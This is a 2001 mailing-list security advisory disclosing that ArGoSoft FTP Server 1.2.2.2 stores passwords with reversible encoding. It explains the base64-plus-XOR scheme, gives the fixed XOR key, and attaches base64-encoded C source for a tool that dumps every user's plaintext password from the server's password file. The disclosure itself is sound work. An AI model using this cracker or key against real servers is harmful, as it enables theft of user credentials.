Date: Thu, 12 Jul 2001 11:36:53 -0700 (PDT)
From: ByteRage <[email protected]>
To: [email protected]Subject: ArGoSoft FTP Server 1.2.2.2 Weak password encryption
--0-12879655-994963013=:50977
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
ArGoSoft FTP Server 1.2.2.2 Weak password encryption
AFFECTED SYSTEMS
ArGoSoft FTP Server 1.2.2.2
DESCRIPTION
ArGoSoft FTP Server 1.2.2.2 for win32 is vulnerable to
decryption of the password file. As a matter of fact
the programmers are aware of this since they have
implemented decryption algorithms within the FTP
Server program itself, as we can find the decrypted
passwords when watching the program's memory dumps, or
using system debuggers or special tools to peek at the
password (User Properties) which is hidden with ****
(normally one would expect this to contain something
like "-=encrypted=-" so that it can only be changed,
but in this case it contains the plaintext password)
This simple observation brings up the fact that the
passwordfile uses a weak password encryption
algorithm, and that the passwords can be obtained from
the ciphertext data.
So, I started studying this program so that I found
the following decryption algorithm :
We have the password in ciphertext : NkouCREIJVU=
1) we lookup the individual ciphertext characters in
the table 'A'-'Z', 'a'-'z', '0'-'9', '+', '/'
and take the indices ranging from 0 -> 63
(these represent 6 bits)
4 of these characters make up 3 binary bytes
(4*6 bits = 3*8 bits)
2) we XOR the resulting binary limb with :
"T3ZlciB0aGUgaGlsbHMgYW5kIGZhciBhd2F5LCBUZWxldHViYmllcyBjb21lIHRvIHBsYXk="
(we XOR the first byte of our decoded stuff with "T",
the second with "3", etc...)
If we finish these two passes we get : NkouCREIJVU= ->
byterage
I've attached source code that decrypts ciphertext
passwords : you can give them as the first parameter
to the executable, or you can also give it the
filename of an ArGoSoft FTP password file, so that it
gives you the passwords of all users.
IMPACT
When combining this with that *.lnk upload bug I
pointed out earlier, any user with write access can
not only traverse directories but also obtain the
passwords of all users.
VENDOR STATUS
I have sent my findings to [email protected] but
since they use the decryption algorithms within the
FTP Server program themselves, they are aware of the
fact that the password encryption is reversible.
Hopefully they will review the encryption algorithm in
a next release.
[ByteRage] [email protected] [www.byterage.cjb.net]
__________________________________________________
Do You Yahoo!?
Get personalized email addresses from Yahoo! Mail
http://personal.mail.yahoo.com/
--0-12879655-994963013=:50977
Content-Type: application/octet-stream; name="agscrack.c"
Content-Transfer-Encoding: base64
Content-Description: agscrack.c
Content-Disposition: attachment; filename="agscrack.c"
LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqDQogKiBhZ3NjcmFjay5jIC0gQXJH
b1NvZnQgRlRQIFNlcnZlciAxLjIuMi4yIHBhc3N3b3JkIGZpbGUgY3JhY2tl
ciAgICoNCiAqIGJ5IFtCeXRlUmFnZV0gPGJ5dGVyYWdlQHlhaG9vLmNvbT4g
W2h0dHA6Ly93d3cuYnl0ZXJhZ2UuY2piLm5ldF0gKg0KICoqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqLw0KDQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVk
ZSA8c3RkaW8uaD4NCg0KaW50IGxlbjsgRklMRSAqZmg7DQoNCi8qIERFQ1JZ
UFRJT04gQUxHT1JJVEhNUyAqLw0KdW5zaWduZWQgY2hhciBjaGFyMmJpbih1
bnNpZ25lZCBjaGFyIGluYnl0ZSkgew0KICBpZiAoKGluYnl0ZSA+PSAnQScp
ICYmIChpbmJ5dGUgPD0gJ1onKSkgeyBsZW4rKzsgcmV0dXJuKGluYnl0ZS0n
QScpOyB9DQogIGlmICgoaW5ieXRlID49ICdhJykgJiYgKGluYnl0ZSA8PSAn
eicpKSB7IGxlbisrOyByZXR1cm4oaW5ieXRlLSdhJysyNik7IH0NCiAgaWYg
KChpbmJ5dGUgPj0gJzAnKSAmJiAoaW5ieXRlIDw9ICc5JykpIHsgbGVuKys7
IHJldHVybihpbmJ5dGUrNCk7IH0NCiAgaWYgKGluYnl0ZSA9PSAnKycpIHsg
bGVuKys7IHJldHVybignXHgzRScpOyB9DQogIGlmIChpbmJ5dGUgPT0gJy8n
KSB7IGxlbisrOyByZXR1cm4oJ1x4M0YnKTsgfQ0KICByZXR1cm4oJ1x4MDAn
KTsNCn0NCnZvaWQgZGVjb2RlKHVuc2lnbmVkIGNoYXIgY2hhcnNbXSwgdW5z
aWduZWQgY2hhciBieXRlc1tdKSB7DQogIGludCBpLHJldHZhbD0wOw0KICBm
b3IoaT0wOyBpPDQ7IGkrKykgeyByZXR2YWwgPDw9IDY7IHJldHZhbCB8PSBj
aGFyMmJpbihjaGFyc1tpXSk7IH0NCiAgZm9yKGk9MDsgaTwzOyBpKyspIHsg
Ynl0ZXNbMi1pXSA9IHJldHZhbCAmIDB4RkY7IHJldHZhbCA+Pj0gODsgfQ0K
ICBsZW4tLTsNCn0NCnZvaWQgZGVjcnlwdHBhc3ModW5zaWduZWQgY2hhciBl
bmNyeXB0ZWRbXSwgdW5zaWduZWQgY2hhciBkZWNyeXB0ZWRbXSkgew0KICBj
b25zdCB1bnNpZ25lZCBjaGFyIGhlYXZ5Y3J5cHQwW10gPSAiVDNabGNpQjBh
R1VnYUdsc2JITWdZVzVrSUdaaGNpQmhkMkY1TENCVVpXeGxkSFZpWW1sbGN5
QmpiMjFsSUhSdklIQnNZWGs9IjsNCiAgdW5zaWduZWQgaW50IGosIGs9MCwg
bDsNCiAgbGVuID0gMDsNCiAgZm9yKGo9MDsgajxzdHJsZW4oZW5jcnlwdGVk
KTsgais9NCkgew0KICAgIGRlY29kZSgmZW5jcnlwdGVkW2pdLCAmZGVjcnlw
dGVkW2tdKTsNCiAgICBmb3IobD0wOyBsPDM7IGwrKykgeyBkZWNyeXB0ZWRb
a10gXj0gaGVhdnljcnlwdDBbaysrXTsgfQ0KICB9DQogIGRlY3J5cHRlZFts
ZW5dID0gJ1x4MDAnOw0KfQ0KLyogREVDUllQVElPTiBBTEdPUklUSE1TIEVO
RCAqLw0KDQp2b2lkIG1haW4oaW50IGFyZ2MsIGNoYXIgKiogYXJndikgew0K
ICBjaGFyIHBhc3N3b3JkWzEyOF07IC8qIEFyR29Tb2Z0J3MgcGFzc3dvcmRz
IGRvbid0IGdldCBsYXJnZXIgdGhhbiAxMjggYnl0ZXMgKi8NCiAgY2hhciBi
dWZbMjU2XTsgY2hhciBiOw0KICBpbnQgcmQ7DQoNCiAgcHJpbnRmKCJBckdv
U29mdCBGVFAgU2VydmVyIDEuMi4yLjIgcGFzc3dvcmQgZmlsZSBjcmFja2Vy
IGJ5IFtCeXRlUmFnZV1cblxuIik7DQogIGlmIChhcmdjPDIpIHsgcHJpbnRm
KCJTeW50YXggOiAlcyA8cGFzc3dvcmQoZmlsZSk+XG4iLCBhcmd2WzBdKTsg
cmV0dXJuIDE7IH0NCiAgDQogIGZoID0gZm9wZW4oYXJndlsxXSwgInJiIik7
DQogIGlmICghZmgpIHsNCiAgICBkZWNyeXB0cGFzcyhhcmd2WzFdLCAmcGFz
c3dvcmQpOw0KICAgIHByaW50ZigiJXMgLT4gJXNcbiIsIGFyZ3ZbMV0sIHBh
c3N3b3JkKTsNCiAgICByZXR1cm4gMDsNCiAgfSBlbHNlIHsNCiAgICAvKiBz
aW1wbGUgcGFzc3dvcmQgZmlsZSBwcm9jZXNzb3IgKi8NCiAgICBmcmVhZCgm
YnVmLDEsMSxmaCk7DQogICAgaWYgKGJ1ZlswXSA9PSA0KSB7DQogICAgICB3
aGlsZSAoMSkgew0KCWlmIChmcmVhZCgmYiwxLDEsZmgpID09IDApIHsgYnJl
YWs7IH0NCiAgICAgICAgaWYgKGZyZWFkKCZidWYsMSxiKzEsZmgpID09IDAp
IHsgYnJlYWs7IH0NCglwcmludGYoIiVzIDogIiwgYnVmKTsNCiAgICAgICAg
Yj0wOyB3aGlsZSghYikgaWYgKGZyZWFkKCZiLDEsMSxmaCkgPT0gMCkgeyBi
cmVhazsgfQ0KCWlmIChmcmVhZCgmYnVmLDEsYisxLGZoKSA9PSAwKSB7IGJy
ZWFrOyB9DQogICAgICAgIGRlY3J5cHRwYXNzKCZidWYsICZwYXNzd29yZCk7
DQoJcHJpbnRmKCIlcyAtPiAlc1xuIiwgJmJ1ZiwgcGFzc3dvcmQpOw0KCWI9
MDsgd2hpbGUoIWIpIGlmIChmcmVhZCgmYiwxLDEsZmgpID09IDApIHsgYnJl
YWs7IH0NCglpZiAoZnJlYWQoJmJ1ZiwxLGIrMSxmaCkgPT0gMCkgeyBicmVh
azsgfQ0KCWI9MDsgd2hpbGUoYiE9NCkgaWYgKGZyZWFkKCZiLDEsMSxmaCkg
PT0gMCkgeyBicmVhazsgfQ0KICAgICAgfQ0KICAgIH0gZWxzZSBwcmludGYo
ImVycm9yIHdoZW4gcHJvY2Vzc2luZyBwYXNzd29yZGZpbGUhIik7DQogICAg
ZmNsb3NlKGZoKTsgIA0KICB9DQp9DQo=
--0-12879655-994963013=:50977--
